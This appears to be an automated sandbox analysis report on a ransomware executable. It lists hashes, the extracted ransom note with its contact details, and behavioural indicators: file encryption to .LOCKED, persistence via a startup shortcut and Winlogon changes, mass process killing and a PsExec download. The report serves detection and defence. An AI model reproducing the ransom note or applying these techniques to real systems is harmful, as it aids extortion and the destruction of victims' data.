c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c

Analysis

max time kernel
134s
max time network
136s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 15:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Size

203KB
MD5

cefd366a2c000d9bbbd35dfd0a73311d
SHA1

0864171c1e033067b04317979803d97f1c90c85b
SHA256

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c
SHA512

5f43b27b0495afb6ded495816405efe4a0d77b9991f56b7bfd09cd56d3ae890ec8dc2461a1806b2131edeaafc15d3478b471d1ef0376f9f78128eff539451040

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_MY_FILES.txt

Ransom Note

ALL YOUR FILES HAS BEEN ENCRYPTED! ALL YOUR FILES HAVE NOW THE .LOCKED EXTENSION! TO DE-CRYPT YOUR FILES, CONTACT US HERE: 1- Download qTox >>> https://tox.chat/download.html 2- Install qTox and make a profile, after you have done this: 3- Use this TOX-ID (Copy + Paste): FF45ED6FCE4433D273E34DA1C22AC1B0290973082BE068066D5EDF6C62EF39500A691BDE33B9 and make a friend request, after 5 minutes, you will be in contact with our negotiator. If you want proof, attach 2-3 encrypted files together with the Key ID (you can find the Key-ID in the How-To-Recover-My-Files document on your Desktop,) less then 5Mb each, non-archived and your files should not contain valuable information, like Databases, back-ups, large excel sheets, etc. You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail! Alternatively, please get in touch with the negotiator at the following email address: [email protected] Key Identifier: lDTO1SAbz9qtw2XFBP12DyqdWP+Tor27gNFwYyAKvoQR/JQjh+ApS27DHMh6Kde5APF+wrIPKG8q08W08qCGtU8SQKUi9YEtgfWsa1YXSWcdLNqpAjYwSY9AI/KtEBHQ7moltUfF4rPSOB3SzqlvAe6ttH0h9bWuJBVTGP+TrW6H04YY7JWWxgaf27+hDYfIhFCI+r4NwqZeSDNPLqM5xTBRLV4pI7p7d8Ie4LqvCg18erTCzG1fWlV5gsbhUo2frbZCPRa5S+uNamY4rMf7eEQUzvcaVi7aBY2igT7yXdsA5oOQFcGA1uX0QpZ75cLH3lQNvIHJBf9MoEw+Xyvn4Ju5LjZPor2dy1KOLYxuEGKdiISkLyml5/Dhh7jVr8zgi0QL8tNBeb+STFoEtbI9CVYw252NsZ4UC3hTkX8JtF2fn7Mb0kWYYaXS/xk0Hsack7Fv28y36YbisdfbKjRh0qmdnCuqFcBUTlrM/3YJ7qHVCrpTUILglqSnrsOxyjJe5jyWHan4M+4l4RNHoCkNAMKBi0MVNiNmWfllXDorPi2Y1fzy/LbryQYcMCiR+ZvD8AHIFsnfWsIZoSl1R4OfDcMuaFjAbHTO1pym6IZHzHEdYEEVD1zVFjdr/Ug5e1gBGXVYq5bMkQ/IS1MF5n9iMJPTHvGc4hg9DOGwUNXH9FY=

Emails

[email protected]

URLs

https://tox.chat/download.html

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
39	2476	mshta.exe
41	2476	mshta.exe

Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	28	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ResolveSync.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\UninstallPublish.crw => C:\Users\Admin\Pictures\UninstallPublish.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\UninstallPublish.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\ConnectDeny.tif => C:\Users\Admin\Pictures\ConnectDeny.tif.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\RegisterUnblock.png => C:\Users\Admin\Pictures\RegisterUnblock.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterUnblock.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\ResolveSync.png => C:\Users\Admin\Pictures\ResolveSync.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\ConnectDeny.tif.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\InitializeTest.crw => C:\Users\Admin\Pictures\InitializeTest.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeTest.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\F:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\K:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\B:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Q:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\U:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\P:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\S:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\G:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\H:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\E:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\T:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\I:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\O:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\J:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\L:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\X:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\V:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\W:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\N:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Y:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Z:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\M:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\R:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files are secured, please read the text note located in your desktop..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

pid	Process
1340	taskkill.exe
1192	taskkill.exe
1272	taskkill.exe
516	taskkill.exe
3188	taskkill.exe
1484	taskkill.exe
2772	taskkill.exe
3808	taskkill.exe
3792	taskkill.exe
948	taskkill.exe
4004	taskkill.exe
3536	taskkill.exe
1016	taskkill.exe
2112	taskkill.exe
1288	taskkill.exe
3884	taskkill.exe
3228	taskkill.exe
1352	taskkill.exe
2192	taskkill.exe
1884	taskkill.exe
2196	taskkill.exe
2524	taskkill.exe
2584	taskkill.exe
2760	taskkill.exe
2028	taskkill.exe
3176	taskkill.exe
1984	taskkill.exe
3572	taskkill.exe
3300	taskkill.exe
3692	taskkill.exe
2276	taskkill.exe
3484	taskkill.exe
3152	taskkill.exe
2368	taskkill.exe
3188	taskkill.exe
1816	taskkill.exe
2608	taskkill.exe
2408	taskkill.exe
3812	taskkill.exe
2380	taskkill.exe
3500	taskkill.exe
3968	taskkill.exe
1316	taskkill.exe
3720	taskkill.exe
2156	taskkill.exe
508	taskkill.exe
2840	taskkill.exe
896	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3760	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
744	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	3536	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	3152	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	3500	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	896	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	3484	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	3808	taskkill.exe
Token: SeDebugPrivilege	3792	taskkill.exe
Token: SeDebugPrivilege	3904	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2732 wrote to memory of 948	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	70
PID 2732 wrote to memory of 948	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	70
PID 2732 wrote to memory of 948	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	70
PID 2732 wrote to memory of 3960	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	72
PID 2732 wrote to memory of 3960	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	72
PID 2732 wrote to memory of 3960	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	72
PID 2732 wrote to memory of 3760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	74
PID 2732 wrote to memory of 3760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	74
PID 2732 wrote to memory of 3760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	74
PID 2732 wrote to memory of 516	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	76
PID 2732 wrote to memory of 516	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	76
PID 2732 wrote to memory of 516	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	76
PID 2732 wrote to memory of 3240	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	78
PID 2732 wrote to memory of 3240	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	78
PID 2732 wrote to memory of 3240	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	78
PID 2732 wrote to memory of 2832	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	81
PID 2732 wrote to memory of 2832	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	81
PID 2732 wrote to memory of 2832	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	81
PID 2732 wrote to memory of 2656	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	80
PID 2732 wrote to memory of 2656	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	80
PID 2732 wrote to memory of 2656	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	80
PID 2732 wrote to memory of 3688	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	84
PID 2732 wrote to memory of 3688	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	84
PID 2732 wrote to memory of 3688	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	84
PID 2732 wrote to memory of 380	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	86
PID 2732 wrote to memory of 380	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	86
PID 2732 wrote to memory of 380	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	86
PID 2732 wrote to memory of 716	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	88
PID 2732 wrote to memory of 716	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	88
PID 2732 wrote to memory of 716	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	88
PID 2732 wrote to memory of 3192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	90
PID 2732 wrote to memory of 3192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	90
PID 2732 wrote to memory of 3192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	90
PID 2732 wrote to memory of 652	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	92
PID 2732 wrote to memory of 652	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	92
PID 2732 wrote to memory of 652	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	92
PID 2732 wrote to memory of 1192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	94
PID 2732 wrote to memory of 1192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	94
PID 2732 wrote to memory of 1192	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	94
PID 2732 wrote to memory of 2760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	96
PID 2732 wrote to memory of 2760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	96
PID 2732 wrote to memory of 2760	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	96
PID 2732 wrote to memory of 2028	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	99
PID 2732 wrote to memory of 2028	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	99
PID 2732 wrote to memory of 2028	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	99
PID 2732 wrote to memory of 3176	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	100
PID 2732 wrote to memory of 3176	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	100
PID 2732 wrote to memory of 3176	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	100
PID 2732 wrote to memory of 1984	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	102
PID 2732 wrote to memory of 1984	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	102
PID 2732 wrote to memory of 1984	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	102
PID 2732 wrote to memory of 4004	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	103
PID 2732 wrote to memory of 4004	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	103
PID 2732 wrote to memory of 4004	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	103
PID 2732 wrote to memory of 3536	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	106
